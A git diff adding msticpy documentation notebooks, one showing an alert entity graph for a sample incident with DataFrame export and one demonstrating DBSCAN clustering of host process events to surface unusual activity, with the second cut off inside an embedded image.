note\",\"text_font_size\":\"10pt\",\"x\":1.4932516813324899,\"x_offset\":5,\"y\":-0.4896693052716502,\"y_offset\":5},\"id\":\"6071\",\"type\":\"Label\"},{\"attributes\":{\"text\":\"Alert Entity graph\"},\"id\":\"6018\",\"type\":\"Title\"},{\"attributes\":{},\"id\":\"6342\",\"type\":\"NodesOnly\"},{\"attributes\":{},\"id\":\"6348\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{},\"id\":\"6351\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"6335\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"callback\":null,\"tooltips\":[[\"node_type\",\"@node_type\"],[\"name\",\"@name\"],[\"description\",\"@description\"],[\"entitytype\",\"@entitytype\"]]},\"id\":\"6050\",\"type\":\"HoverTool\"},{\"attributes\":{\"axis\":{\"id\":\"6032\"},\"dimension\":1,\"ticker\":null},\"id\":\"6035\",\"type\":\"Grid\"},{\"attributes\":{\"axis\":{\"id\":\"6028\"},\"ticker\":null},\"id\":\"6031\",\"type\":\"Grid\"},{\"attributes\":{\"end\":3,\"start\":-3},\"id\":\"6020\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"6334\",\"type\":\"AllLabels\"},{\"attributes\":{\"overlay\":{\"id\":\"6042\"}},\"id\":\"6038\",\"type\":\"BoxZoomTool\"},{\"attributes\":{},\"id\":\"6024\",\"type\":\"LinearScale\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"field\":\"node_color\"},\"size\":{\"value\":25}},\"id\":\"6062\",\"type\":\"Circle\"},{\"attributes\":{},\"id\":\"6039\",\"type\":\"SaveTool\"},{\"attributes\":{},\"id\":\"6036\",\"type\":\"PanTool\"},{\"attributes\":{\"active_multi\":null,\"tools\":[{\"id\":\"6036\"},{\"id\":\"6037\"},{\"id\":\"6038\"},{\"id\":\"6039\"},{\"id\":\"6040\"},{\"id\":\"6041\"},{\"id\":\"6050\"}]},\"id\":\"6043\",\"type\":\"Toolbar\"},{\"attributes\":{},\"id\":\"6352\",\"type\":\"UnionRenderers\"}],\"root_ids\":[\"6017\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.3\"}};\n  var render_items = [{\"docid\":\"9a0e79a1-e492-4309-89f5-99a7d9967855\",\"root_ids\":[\"6017\"],\"roots\":{\"6017\":\"f3075cff-6098-4bad-b1c8-4c94bddb3b13\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);",
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "6017"
+      }
+     },
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div style=\"display: table;\"><div style=\"display: table-row;\"><div style=\"display: table-cell;\"><b title=\"bokeh.plotting.figure.Figure\">Figure</b>(</div><div style=\"display: table-cell;\">id&nbsp;=&nbsp;'6017', <span id=\"6478\" style=\"cursor: pointer;\">&hellip;)</span></div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">above&nbsp;=&nbsp;[],</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">align&nbsp;=&nbsp;'start',</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_ratio&nbsp;=&nbsp;None,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_scale&nbsp;=&nbsp;1,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background&nbsp;=&nbsp;None,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background_fill_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background_fill_color&nbsp;=&nbsp;'#ffffff',</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">below&nbsp;=&nbsp;[LinearAxis(id='6028', ...)],</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">border_fill_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">border_fill_color&nbsp;=&nbsp;'#ffffff',</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">center&nbsp;=&nbsp;[Grid(id='6031', ...), Grid(id='6035', ...), Label(id='6067', ...), Label(id='6068', ...), Label(id='6069', ...), Label(id='6070', ...), Label(id='6071', ...)],</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">css_classes&nbsp;=&nbsp;[],</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">disabled&nbsp;=&nbsp;False,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">extra_x_ranges&nbsp;=&nbsp;{},</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">extra_y_ranges&nbsp;=&nbsp;{},</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">frame_height&nbsp;=&nbsp;None,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">frame_width&nbsp;=&nbsp;None,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height&nbsp;=&nbsp;800,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">hidpi&nbsp;=&nbsp;True,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">inner_height&nbsp;=&nbsp;0,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">inner_width&nbsp;=&nbsp;0,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_event_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_property_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">left&nbsp;=&nbsp;[LinearAxis(id='6032', ...)],</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_factor&nbsp;=&nbsp;10,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_interval&nbsp;=&nbsp;300,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_threshold&nbsp;=&nbsp;2000,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_timeout&nbsp;=&nbsp;500,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">margin&nbsp;=&nbsp;(0, 0, 0, 0),</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">match_aspect&nbsp;=&nbsp;False,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_height&nbsp;=&nbsp;None,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_width&nbsp;=&nbsp;None,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border&nbsp;=&nbsp;5,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_bottom&nbsp;=&nbsp;None,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_left&nbsp;=&nbsp;None,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_right&nbsp;=&nbsp;None,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_top&nbsp;=&nbsp;None,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_height&nbsp;=&nbsp;None,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_width&nbsp;=&nbsp;None,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">name&nbsp;=&nbsp;None,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outer_height&nbsp;=&nbsp;0,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outer_width&nbsp;=&nbsp;0,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_cap&nbsp;=&nbsp;'butt',</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_color&nbsp;=&nbsp;'#e5e5e5',</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_dash&nbsp;=&nbsp;[],</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_dash_offset&nbsp;=&nbsp;0,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_join&nbsp;=&nbsp;'bevel',</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_width&nbsp;=&nbsp;1,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">output_backend&nbsp;=&nbsp;'canvas',</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">renderers&nbsp;=&nbsp;[GraphRenderer(id='6052', ...)],</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">reset_policy&nbsp;=&nbsp;'standard',</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">right&nbsp;=&nbsp;[],</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">sizing_mode&nbsp;=&nbsp;None,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">subscribed_events&nbsp;=&nbsp;[],</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">syncable&nbsp;=&nbsp;True,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">tags&nbsp;=&nbsp;[],</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">title&nbsp;=&nbsp;Title(id='6018', ...),</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">title_location&nbsp;=&nbsp;'above',</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar&nbsp;=&nbsp;Toolbar(id='6043', ...),</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar_location&nbsp;=&nbsp;'right',</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar_sticky&nbsp;=&nbsp;True,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">visible&nbsp;=&nbsp;True,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width&nbsp;=&nbsp;800,</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">x_range&nbsp;=&nbsp;Range1d(id='6020', ...),</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">x_scale&nbsp;=&nbsp;LinearScale(id='6024', ...),</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">y_range&nbsp;=&nbsp;Range1d(id='6022', ...),</div></div><div class=\"6477\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">y_scale&nbsp;=&nbsp;LinearScale(id='6026', ...))</div></div></div>\n",
+       "<script>\n",
+       "(function() {\n",
+       "  var expanded = false;\n",
+       "  var ellipsis = document.getElementById(\"6478\");\n",
+       "  ellipsis.addEventListener(\"click\", function() {\n",
+       "    var rows = document.getElementsByClassName(\"6477\");\n",
+       "    for (var i = 0; i < rows.length; i++) {\n",
+       "      var el = rows[i];\n",
+       "      el.style.display = expanded ? \"none\" : \"table-row\";\n",
+       "    }\n",
+       "    ellipsis.innerHTML = expanded ? \"&hellip;)\" : \"&lsaquo;&lsaquo;&lsaquo;\";\n",
+       "    expanded = !expanded;\n",
+       "  });\n",
+       "})();\n",
+       "</script>\n"
+      ],
+      "text/plain": [
+       "Figure(id='6017', ...)"
+      ]
+     },
+     "execution_count": 24,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "graph.add_note(name=\"This is a note\", \n",
+    "    description=\"Notes allow for free form additions to the graph\", \n",
+    "    attached_to=\"Incident: Sample Incident\")\n",
+    "graph.plot()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Exporting to a DataFrame\n",
+    "\n",
+    "As a graph has been built up during the course of the investigation you  may want to access or export some of the key elements of the graph. This can easily be done with the `to_df` function.\n",
+    "\n",
+    "<div class=\"alert alert-block alert-info\">\n",
+    "<b>Note:</b>  The EntityGraph is built on NetworkX. If you want to access the networkx object of the graph it can be accessed with `alertentity_graph`.\n",
+    "</div>"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 26,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>Name</th>\n",
+       "      <th>Description</th>\n",
+       "      <th>Type</th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>EndTime</th>\n",
+       "      <th>StartTime</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>Sample Incident</td>\n",
+       "      <td>2021-09-22T15:09:09.2786667Z - Sample Incident - 123</td>\n",
+       "      <td>incident</td>\n",
+       "      <td>2021-09-22 15:09:09.278666700</td>\n",
+       "      <td>2021-09-22T14:39:24.04Z</td>\n",
+       "      <td>2021-09-22T14:39:24.04Z</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>User Added to Priviledged Group in CONTOSO Domain</td>\n",
+       "      <td>User Added to Priviledged Group in CONTOSO Domain - ['8b7d06d8-dbae-4b23-87ed-1a27b75437d5']</td>\n",
+       "      <td>alert</td>\n",
+       "      <td>NaT</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>CONTOSO\\auser</td>\n",
+       "      <td>None</td>\n",
+       "      <td>entity</td>\n",
+       "      <td>NaT</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>www.contoso.com</td>\n",
+       "      <td>www.contoso.com</td>\n",
+       "      <td>entity</td>\n",
+       "      <td>NaT</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>This is a note</td>\n",
+       "      <td>Notes allow for free form additions to the graph</td>\n",
+       "      <td>analystnote</td>\n",
+       "      <td>2021-10-06 09:05:35.203699000</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                                                Name  \\\n",
+       "0                                    Sample Incident   \n",
+       "1  User Added to Priviledged Group in CONTOSO Domain   \n",
+       "2                                      CONTOSO\\auser   \n",
+       "3                                    www.contoso.com   \n",
+       "4                                     This is a note   \n",
+       "\n",
+       "                                                                                    Description  \\\n",
+       "0                                          2021-09-22T15:09:09.2786667Z - Sample Incident - 123   \n",
+       "1  User Added to Priviledged Group in CONTOSO Domain - ['8b7d06d8-dbae-4b23-87ed-1a27b75437d5']   \n",
+       "2                                                                                          None   \n",
+       "3                                                                               www.contoso.com   \n",
+       "4                                              Notes allow for free form additions to the graph   \n",
+       "\n",
+       "          Type                 TimeGenerated                  EndTime  \\\n",
+       "0     incident 2021-09-22 15:09:09.278666700  2021-09-22T14:39:24.04Z   \n",
+       "1        alert                           NaT                     None   \n",
+       "2       entity                           NaT                     None   \n",
+       "3       entity                           NaT                     None   \n",
+       "4  analystnote 2021-10-06 09:05:35.203699000                     None   \n",
+       "\n",
+       "                 StartTime  \n",
+       "0  2021-09-22T14:39:24.04Z  \n",
+       "1                     None  \n",
+       "2                     None  \n",
+       "3                     None  \n",
+       "4                     None  "
+      ]
+     },
+     "execution_count": 26,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "graph.to_df()"
+   ]
+  }
+ ],
+ "metadata": {
+  "interpreter": {
+   "hash": "70673dbb0e081aa3831869ef2042eea6ce08ea300fe5aabb70c669fac0ce2a09"
+  },
+  "kernelspec": {
+   "display_name": "Python 3.8.10 64-bit ('dev38': conda)",
+   "name": "python3"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.8.10"
+  },
+  "orig_nbformat": 4
+ },
+ "nbformat": 4,
+ "nbformat_minor": 2
+}
diff --git a/docs/notebooks/EventClustering.ipynb b/docs/notebooks/EventClustering.ipynb
new file mode 100644
index 000000000..d42aaae09
--- /dev/null
+++ b/docs/notebooks/EventClustering.ipynb
@@ -0,0 +1,2413 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "source": [
+    "<h1>Table of Contents<span class=\"tocSkip\"></span></h1>\n",
+    "<div class=\"toc\"><ul class=\"toc-item\"><li><span><a href=\"#msticpy---Event-Clustering\" data-toc-modified-id=\"msticpy---Event-Clustering-1\">msticpy - Event Clustering</a></span></li><li><span><a href=\"#Processes-on-Host---Clustering\" data-toc-modified-id=\"Processes-on-Host---Clustering-2\">Processes on Host - Clustering</a></span><ul class=\"toc-item\"><li><ul class=\"toc-item\"><li><ul class=\"toc-item\"><li><span><a href=\"#Clustered-Processes-(i.e.-processes-that-have-a-cluster-size->-1)\" data-toc-modified-id=\"Clustered-Processes-(i.e.-processes-that-have-a-cluster-size->-1)-2.0.0.1\">Clustered Processes (i.e. processes that have a cluster size &gt; 1)</a></span></li></ul></li><li><span><a href=\"#Time-showing-clustered-vs.-original-data\" data-toc-modified-id=\"Time-showing-clustered-vs.-original-data-2.0.1\">Time showing clustered vs. original data</a></span></li></ul></li></ul></li><li><span><a href=\"#Host-Logons\" data-toc-modified-id=\"Host-Logons-3\">Host Logons</a></span><ul class=\"toc-item\"><li><ul class=\"toc-item\"><li><span><a href=\"#Comparing-All-Logons-with-Clustered-results-relative-to-Alert-time-line\" data-toc-modified-id=\"Comparing-All-Logons-with-Clustered-results-relative-to-Alert-time-line-3.0.1\">Comparing All Logons with Clustered results relative to Alert time line</a></span></li><li><span><a href=\"#View-Process-Session-and-Logon-Events-in-Timelines\" data-toc-modified-id=\"View-Process-Session-and-Logon-Events-in-Timelines-3.0.2\">View Process Session and Logon Events in Timelines</a></span></li></ul></li><li><span><a href=\"#Get-Process-Tree\" data-toc-modified-id=\"Get-Process-Tree-3.1\">Get Process Tree</a></span></li></ul></li></ul></div>"
+   ],
+   "metadata": {
+    "toc": true
+   }
+  },
+  {
+   "cell_type": "markdown",
+   "source": [
+    "# msticpy - Event Clustering\n",
+    "\n",
+    "Often, large sets of events contain a lot of very repetitive and unintersting system processes. However, these frequently have values (e.g. commandline or path content) that varies on each execution. This makes it difficult to find outlying events using standard sorting and grouping techniques.\n",
+    "We process the data to extract patterns and use clustering to group these repetitive events into a single row (with an execution count). This makes it easier to find unusual events.\n",
+    "\n",
+    "You must have msticpy installed with the \"ml\" components to run this notebook:\n",
+    "```\n",
+    "%pip install --upgrade msticpy[ml]\n",
+    "```\n",
+    "\n"
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "source": [
+    "%pip install seaborn"
+   ],
+   "outputs": [],
+   "metadata": {}
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 1,
+   "source": [
+    "# Imports\r\n",
+    "import sys\r\n",
+    "import warnings\r\n",
+    "\r\n",
+    "from msticpy.common.utility import check_py_version\r\n",
+    "MIN_REQ_PYTHON = (3,6)\r\n",
+    "check_py_version(MIN_REQ_PYTHON)\r\n",
+    "\r\n",
+    "from IPython import get_ipython\r\n",
+    "from IPython.display import display, HTML, Markdown\r\n",
+    "import ipywidgets as widgets\r\n",
+    "\r\n",
+    "import matplotlib.pyplot as plt\r\n",
+    "import seaborn as sns\r\n",
+    "sns.set()\r\n",
+    "import networkx as nx\r\n",
+    "\r\n",
+    "import pandas as pd\r\n",
+    "pd.set_option('display.max_rows', 100)\r\n",
+    "pd.set_option('display.max_columns', 50)\r\n",
+    "pd.set_option('display.max_colwidth', 100)\r\n",
+    "\r\n",
+    "from msticpy.data import QueryProvider\r\n",
+    "from msticpy.nbtools import *\r\n",
+    "from msticpy.sectools import *\r\n",
+    "from msticpy.nbtools.foliummap import FoliumMap\r\n",
+    "\r\n",
+    "WIDGET_DEFAULTS = {'layout': widgets.Layout(width='95%'),\r\n",
+    "                   'style': {'description_width': 'initial'}}\r\n",
+    "\r\n",
+    "# Some of our dependencies (networkx) still use deprecated Matplotlib\r\n",
+    "# APIs - we can't do anything about it so suppress them from view\r\n",
+    "from matplotlib import MatplotlibDeprecationWarning\r\n",
+    "warnings.simplefilter(\"ignore\", category=MatplotlibDeprecationWarning)\r\n"
+   ],
+   "outputs": [],
+   "metadata": {}
+  },
+  {
+   "cell_type": "markdown",
+   "source": [
+    "<a id='process_clustering'></a>[Contents](#toc)\n",
+    "# Processes on Host - Clustering\n",
+    "Sometimes you don't have a source process to work with. Other times it's just useful to see what else is going on on the host. This section retrieves all processes on the host within the time bounds\n",
+    "set in the query times widget.\n",
+    "\n",
+    "You can display the raw output of this by looking at the *processes_on_host* dataframe. Just copy this into a new cell and hit Ctrl-Enter.\n",
+    "\n",
+    "Usually though, the results return a lot of very repetitive and unintersting system processes so we attempt to cluster these to make the view easier to negotiate. \n",
+    "To do this we process the raw event list output to extract a few features that render strings (such as commandline)into numerical values. The default below uses the following features:\n",
+    "- commandLineTokensFull - this is a count of common delimiters in the commandline \n",
+    "  (given by this regex r'[\\s\\-\\\\/\\.,\"\\'|&:;%$()]'). The aim of this is to capture the commandline structure while ignoring variations on what is essentially the same pattern (e.g. temporary path GUIDs, target IP or host names, etc.)\n",
+    "- pathScore - this sums the ordinal (character) value of each character in the path (so /bin/bash and /bin/bosh would have similar scores).\n",
+    "- isSystemSession - 1 if this is a root/system session, 0 if anything else.\n",
+    "\n",
+    "Then we run a clustering algorithm (DBScan in this case) on the process list. The result groups similar (noisy) processes together and leaves unique process patterns as single-member clusters."
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "markdown",
+   "source": [
+    "#### Clustered Processes (i.e. processes that have a cluster size > 1)"
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 2,
+   "source": [
+    "from msticpy.analysis.eventcluster import dbcluster_events, add_process_features\r\n",
+    "processes_on_host = pd.read_csv('data/processes_on_host.csv',\r\n",
+    "                                parse_dates=[\"TimeGenerated\"],\r\n",
+    "                                infer_datetime_format=True)\r\n",
+    "\r\n",
+    "feature_procs = add_process_features(input_frame=processes_on_host)\r\n",
+    "\r\n",
+    "\r\n",
+    "# you might need to play around with the max_cluster_distance parameter.\r\n",
+    "# decreasing this gives more clusters.\r\n",
+    "(clus_events, dbcluster, x_data) = dbcluster_events(data=feature_procs,\r\n",
+    "                                                    cluster_columns=['commandlineTokensFull', \r\n",
+    "                                                                     'pathScore', \r\n",
+    "                                                                     'isSystemSession'],\r\n",
+    "                                                    time_column=\"TimeGenerated\",\r\n",
+    "                                                    max_cluster_distance=0.0001)\r\n",
+    "print('Number of input events:', len(feature_procs))\r\n",
+    "print('Number of clustered events:', len(clus_events))\r\n",
+    "clus_events[['ClusterSize', 'processName']][clus_events['ClusterSize'] > 1].plot.bar(x='processName', \r\n",
+    "                                                                                     title='Process names with Cluster > 1', \r\n",
+    "                                                                                     figsize=(12,3));"
+   ],
+   "outputs": [
+    {
+     "output_type": "stream",
+     "name": "stdout",
+     "text": [
+      "Number of input events: 363\n",
+      "Number of clustered events: 62\n"
+     ]
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/plain": [
+       "<Figure size 864x216 with 1 Axes>"
+      ],
+      "image/png": "iVBORw0KGgoAAAANSUhEUgAAAsEAAAFVCAYAAAAOrjK8AAAAOXRFWHRTb2Z0d2FyZQBNYXRwbG90bGliIHZlcnNpb24zLjMuMSwgaHR0cHM6Ly9tYXRwbG90bGliLm9yZy/d3fzzAAAACXBIWXMAAAsTAAALEwEAmpwYAAB3TElEQVR4nO3dd1gU1/s28HsBERR7QI0aY8fE3hHsDQtFNEqiYItd7Ar2glgxKmD/xkqMUQEVRewa7C2K2AvYFRSlSN897x++uz9XUZGdUVbuz3XlijuL9x5nZncfzpw5RyGEECAiIiIiykUMvnYDiIiIiIi+NBbBRERERJTrsAgmIiIiolyHRTARERER5TosgomIiIgo12ERTERERES5DotgIpLFw4cPUbVqVTg4OGj+s7e3x7Zt27520755S5Yswfbt2wEAfn5+OHDgAADAw8MDf/75Z5Yynj17Bg8PD9jZ2cHe3h6//PKLJgcAqlSpgtjY2Gy1Lzw8HFOnTs3W39XF9evXYWNj88Vfl4hyJqOv3QAi+naZmJhgx44dmsfPnj1Dp06dUK1aNVhaWn7Fln3bRowYofnz6dOnUbFixc/6+7GxsXB2dsaIESMwZ84cKBQKXL9+HX369IGpqSmsra11at/t27fx7NkznTJu3bqFEydOwNHREYUKFfroz2ZkZMDf3x+rV69GUlKSTq9LRN8OFsFE9MUUL14cZcuWRVRUFK5evYpt27YhOTkZZmZm2LhxI5YuXYrdu3fD0NAQ5cqVw5QpU2Bubo6YmBhMmzYNd+/ehYGBAZydneHq6oqEhAR4eXnh5s2bSE9Ph5WVFcaPHw8jIyP4+Phg//79yJMnD4oUKYI5c+bAwsLig9vf5uHhATMzM9y4cQNPnz5FlSpVMG/ePOTPnx/btm3DP//8g/T0dMTFxaF///747bffEBgYiH379kGlUuHx48coXrw4unXrBn9/f0RFRaFPnz7o27cvAGDr1q34+++/oVKpULhwYUyZMgUVKlTAuXPnMHfuXKhUKgDAwIED0a5dO622OTg4w